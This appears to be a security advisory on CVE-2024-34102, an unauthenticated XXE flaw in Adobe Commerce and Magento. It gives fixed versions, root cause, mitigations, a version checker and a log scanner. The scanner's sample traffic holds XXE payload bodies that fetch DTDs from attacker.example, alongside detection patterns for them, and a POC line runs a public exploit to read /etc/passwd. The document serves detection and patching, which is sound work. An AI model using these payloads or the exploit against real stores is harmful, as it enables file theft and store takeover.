Adobe Magento Unauthenticated XXE – CVE-2024-34102

Vulnerable Version

Adobe Commerce: 2.4.7 and earlier; 2.4.6-p5 and earlier; 2.4.5-p7 and earlier; 2.4.4-p8 and earlier; 2.4.3-ext-7 and earlier; 2.4.2-ext-7 and earlier
Magento Open Source: 2.4.7 and earlier; 2.4.6-p5 and earlier; 2.4.5-p7 and earlier; 2.4.4-p8 and earlier
Adobe Commerce Webhooks Plugin: 1.2.0 to 1.4.0

Note that the base releases themselves are affected: 2.4.7 is vulnerable, 2.4.7-p1 is the first fixed build on that branch.

Fixed Version

Adobe Commerce and Magento Open Source: 2.4.7-p1, 2.4.6-p6, 2.4.5-p8 or 2.4.4-p9 (Adobe Commerce extended support: 2.4.3-ext-8, 2.4.2-ext-8). Adobe Commerce Webhooks Plugin: 1.5.0. Adobe also published an isolated hotfix for the same branches for stores that cannot take the full patch release immediately.
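Version strings are easy to misread for this CVE (2.4.7 itself is affected, 2.4.7-p1 is the fix, and the extended-support branches use an "ext" counter instead of "p"). The checker below is an added example, not code from this page or from Adobe: it parses a Magento version string, such as the "Magento CLI 2.4.6-p5" line printed by `bin/magento --version`, and reports whether that build predates the fixed release on its branch. The fixed-version table is Adobe's; treating branches newer than 2.4.7 as patched and branches older than 2.4.2 as out of support is an assumption made here.

```python
import re

# Fixed releases per branch, from Adobe's advisory for CVE-2024-34102.
# "p" (security patch) and "ext" (extended support) are separate counters.
FIXED = {
    (2, 4, 7): ("p", 1),
    (2, 4, 6): ("p", 6),
    (2, 4, 5): ("p", 8),
    (2, 4, 4): ("p", 9),
    (2, 4, 3): ("ext", 8),
    (2, 4, 2): ("ext", 8),
}
NEWEST_BRANCH_IN_ADVISORY = (2, 4, 7)

# A base release ranks below its p-releases, which rank below the ext-releases
# of the same branch (extended support begins after the last p-release).
_KIND_RANK = {"": 0, "p": 1, "ext": 2}

# Matches 2.4.7, 2.4.6-p5 and 2.4.3-ext-7, anywhere in a line of text.
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-(p|ext)-?(\d+))?\b")


def parse_version(text: str) -> tuple[tuple[int, int, int], str, int]:
    """Return (branch, kind, patch) for the first Magento version in text."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no Magento version in {text!r}")
    branch = (int(m.group(1)), int(m.group(2)), int(m.group(3)))
    kind = m.group(4) or ""            # "" for a base release such as 2.4.7
    patch = int(m.group(5) or 0)
    return branch, kind, patch


def status(text: str) -> str:
    """'vulnerable', 'patched' or 'unsupported' with respect to CVE-2024-34102."""
    branch, kind, patch = parse_version(text)
    if branch in FIXED:
        fixed_kind, fixed_patch = FIXED[branch]
        have = (_KIND_RANK[kind], patch)
        need = (_KIND_RANK[fixed_kind], fixed_patch)
        return "patched" if have >= need else "vulnerable"
    if branch > NEWEST_BRANCH_IN_ADVISORY:
        # Assumption: releases after the advisory (2.4.8 and later) ship the fix.
        return "patched"
    # Assumption: branches older than 2.4.2 are out of Adobe support and were
    # never patched for this issue; treat them as exposed.
    return "unsupported"


if __name__ == "__main__":
    for v in ("Magento CLI 2.4.6-p5", "2.4.7", "2.4.7-p1", "2.4.3-ext-7", "2.3.7-p4"):
        print(f"{v:24} {status(v)}")
```

Feed it the output of `bin/magento --version` from each node; a result of "vulnerable" on any node means the isolated hotfix or the patch release still has to be applied there, and "unsupported" means the branch needs an upgrade rather than a patch.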

Base Score

9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Vendor Description:-

Adobe Commerce and Magento Open Source are widely used e-commerce platforms for building and running online stores. Magento, originally an open-source project and now owned by Adobe, offers extensive customization options and a large feature set for businesses of all sizes. Adobe Commerce, the enterprise edition, builds on the same code base with additional features and integration with Adobe's marketing and analytics products, and is aimed mainly at large-scale merchants.

Vulnerability Description:-

CVE-2024-34102, publicly nicknamed CosmicSting, is a critical XML External Entity (XXE) vulnerability (CWE-611) in Adobe Commerce and Magento Open Source. The root cause is in the web API's input deserializer: nested JSON in a request body is mapped onto the constructor parameters of the PHP classes behind an endpoint's typed parameters, without restricting which classes may be instantiated along the way. An unauthenticated request to a guest-facing REST endpoint can therefore walk a chain of service objects until it reaches a SimpleXMLElement constructor and controls its $data, $options and $dataIsURL arguments, so attacker-supplied XML, or a URL to attacker-hosted XML and DTD, is parsed with external entities enabled.

The first-order impact is an arbitrary file read on the application server. The file that matters most is app/etc/env.php, which contains the store's encryption key; with that key an attacker can forge administrator tokens and call the REST, GraphQL or SOAP APIs with full privileges, leading to data theft, service disruption and full compromise of the store.

CVE-2024-34102 can also be chained with CVE-2024-2961, a buffer overflow in glibc's iconv (the ISO-2022-CN-EXT converter) that is reachable from a PHP file-read primitive through php://filter conversion chains, turning the file read into remote code execution (RCE). Independently of that chain, XXE issued from the PHP worker doubles as server-side request forgery against internal services that are reachable from the application server but not from the internet.
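The mechanism above also says what to look for in traffic: an unauthenticated POST to an API path whose JSON body carries the SimpleXMLElement constructor argument `dataIsURL`, a URL where cart data should be, or an inline XML document with a DTD. The scanner below is an added example, not code from this page, from the PoC repository or from Adobe. The JSON-lines access log format and the sample requests are constructed for it; the nested key chain in the malicious sample is modelled on the public PoC linked under References, but the scanner does not depend on those names.

```python
import json
import re
from typing import Any, Iterator

# Paths under which Magento's web API deserializes request bodies into objects.
API_PREFIXES = ("/rest/", "/graphql", "/soap/")
# Inline XML carrying a DTD: the part of an XXE payload that declares entities.
DTD_RE = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)
# Anything SimpleXMLElement would fetch when dataIsURL is true.
URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def _walk(node: Any, depth: int = 0) -> Iterator[tuple[int, Any, Any]]:
    """Yield (depth, key, value) for every key in a nested JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield depth, key, value
            yield from _walk(value, depth + 1)
    elif isinstance(node, list):
        for item in node:
            yield from _walk(item, depth + 1)


def scan_body(body: str) -> list[str]:
    """Return the indicators found in one JSON request body ([] if clean)."""
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return []
    reasons: list[str] = []
    max_depth = 0
    for depth, key, value in _walk(data):
        max_depth = max(max_depth, depth)
        # dataIsURL is the third parameter of SimpleXMLElement::__construct;
        # no storefront client has a reason to send it to a cart endpoint.
        if key == "dataIsURL" and value is True:
            reasons.append("dataIsURL=true (SimpleXMLElement constructor argument)")
        if key == "data" and isinstance(value, str) and URL_RE.match(value):
            reasons.append(f"remote XML source {value}")
        if isinstance(value, str) and DTD_RE.search(value):
            reasons.append("inline XML with DOCTYPE/ENTITY declaration")
    if reasons:
        # Reported only next to a strong indicator: legitimate cart payloads
        # are shallow, a constructor gadget chain is not.
        reasons.append(f"object nesting depth {max_depth}")
    return reasons


def scan_log(lines: list[str]) -> list[dict[str, Any]]:
    """Scan JSON-lines access records; one finding per suspicious API POST."""
    findings: list[dict[str, Any]] = []
    for line in lines:
        rec = json.loads(line)
        if rec.get("method") != "POST" or not rec.get("path", "").startswith(API_PREFIXES):
            continue
        reasons = scan_body(rec.get("body", ""))
        if reasons:
            findings.append({"src": rec.get("src"), "path": rec["path"], "reasons": reasons})
    return findings


# Constructed sample traffic (not real logs). The key chain in the second body
# is modelled on the public PoC; the scanner keys only on dataIsURL, URL data
# and DOCTYPE/ENTITY, never on those names.
_BENIGN_BODY = {"address": {"country_id": "AT", "postcode": "1010", "city": "Vienna"}}
_REMOTE_DTD_BODY = {"address": {"totalsReader": {"collectorList": {"totalCollector": {
    "sourceData": {"data": "http://attacker.example/xxe.xml", "options": 16, "dataIsURL": True}}}}}}
_INLINE_DTD_BODY = {"address": {"payload": {
    "data": '<?xml version="1.0"?><!DOCTYPE t [<!ENTITY % e SYSTEM "http://attacker.example/e.dtd">%e;]><t/>',
    "options": 2}}}
_CART = "/rest/V1/guest-carts/abc123/estimate-shipping-methods"

SAMPLE_LOG = [
    json.dumps({"src": "198.51.100.7", "method": "POST", "path": _CART, "body": json.dumps(_BENIGN_BODY)}),
    json.dumps({"src": "203.0.113.9", "method": "POST", "path": _CART, "body": json.dumps(_REMOTE_DTD_BODY)}),
    json.dumps({"src": "203.0.113.9", "method": "POST", "path": _CART, "body": json.dumps(_INLINE_DTD_BODY)}),
    json.dumps({"src": "192.0.2.4", "method": "GET", "path": "/catalog/product/view/id/1", "body": ""}),
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["src"], finding["path"], *finding["reasons"], sep="\n  ")
```

This is a triage aid, not a WAF. Most stores log only the request line, so request bodies have to be captured at the reverse proxy before a scan like this has anything to work on. A hit on `dataIsURL` or a DOCTYPE at a guest-cart endpoint has no legitimate explanation and should be treated as an exploitation attempt; the same indicators, written as a request-body rule, are what an edge filter should block until the patch is in place.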

Impact:-

An unauthenticated remote attacker can exploit this vulnerability to read arbitrary files from the server and, through the chains described above, execute arbitrary code, leading to complete compromise of the affected Adobe Commerce installation: access to sensitive data, escalation to administrator privileges and unauthorized control of the store.

Mitigations:-

  • Apply Security Patches – Upgrade to 2.4.7-p1, 2.4.6-p6, 2.4.5-p8 or 2.4.4-p9 (or apply Adobe's isolated hotfix for the same branches). This is the only fix; the items below are compensating controls.
  • Rotate Encryption Keys – After patching, rotate the encryption key stored in app/etc/env.php and invalidate existing admin and integration tokens. An attacker who already read the file can keep forging administrator tokens against an otherwise patched store.
  • Block the Payload at the Edge – Add a WAF rule for POST bodies to /rest/, /graphql and /soap paths that contain dataIsURL, <!DOCTYPE or <!ENTITY. Legitimate storefront clients send none of these.
  • Restrict Egress – The exploit needs the PHP workers to fetch a remote DTD and deliver the file contents to an out-of-band host. Deny outbound HTTP from web and PHP nodes except to the services they actually use.
  • Secure Privileged API Access – Restrict admin and integration token use to known source ranges and rotate integration tokens. This does not stop the exploit itself, because the affected endpoints accept unauthenticated guest traffic, but it limits what a forged token can reach.
  • XML Handling – libxml_disable_entity_loader() does not help here: it is deprecated since PHP 8.0, and the attacker supplies the SimpleXMLElement options anyway. For XML your own code parses, never pass LIBXML_NOENT or LIBXML_DTDLOAD.
  • Harden Deserialization – Map API input onto explicit DTOs with an allowlist of instantiable classes and settable properties instead of resolving arbitrary nested JSON into constructor arguments. This vulnerability lives in JSON deserialization, so "prefer JSON over unserialize()" is not a mitigation for it.

POC

Exploit – public PoC (first link under References)

Run it with a local attacker web server hosting the DTD and a local out-of-band (OOB) listener that receives the exfiltrated file contents:

python3 exploit.py -t https://magento.test -r "/etc/passwd"

Reference:-

https://github.com/jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento

https://www.vicarius.io/vsociety/posts/cosmicsting-critical-unauthenticated-xxe-vulnerability-in-adobe-commerce-and-magento-cve-2024-34102-exploit
